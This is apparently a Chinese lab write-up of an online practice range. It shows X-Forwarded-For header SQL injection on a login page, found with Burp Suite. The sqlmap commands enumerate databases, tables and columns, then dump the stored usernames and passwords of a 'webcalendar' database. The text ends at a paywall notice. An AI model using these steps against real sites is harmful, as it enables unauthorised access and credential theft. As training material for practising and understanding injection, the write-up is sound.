什么是X-Forwarded-For?
X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。
首先,我们来看一下墨者在线靶场中X-Forwarded-For注入漏洞实战的一个界面
我们可以看到是一个后台管理登录界面
随便输入一个账号密码,使用bp抓包
显示登录失败,以及我们当前IP被记录
将数据包发送到repeater中进行重发,添加XFF并把其值添加为随意IP
重发之后我们发现响应包中的IP也随之改变
我们猜测服务器后端可能是在获取XFF数据
将XFF的IP值后追加 *
将抓取到的数据包放入txt文档中
使用sqlmap进行探测
sqlmap -r /home/kali_lxy/桌面/xff.txt --dbs --batch
获取到数据库名称
继续探测数据库的表
sqlmap -r /home/kali_lxy/桌面/xff.txt -D webcalendar --tables –batch
探测出两个表
继续探测表中的列名
sqlmap -r /home/kali_lxy/桌面/xff.txt -D webcalendar -T user --columns –batch
我们发现有password和username
使用—dump拖库,查看账号密码
sqlmap -r /home/kali_lxy/桌面/xff.txt -D webcalendar -T user -C 'password,username' --dump –batch
成功拿到账号密码
使用账号密码进行登录,即可获得KEY值
本文含有隐藏内容,请 开通VIP 后查看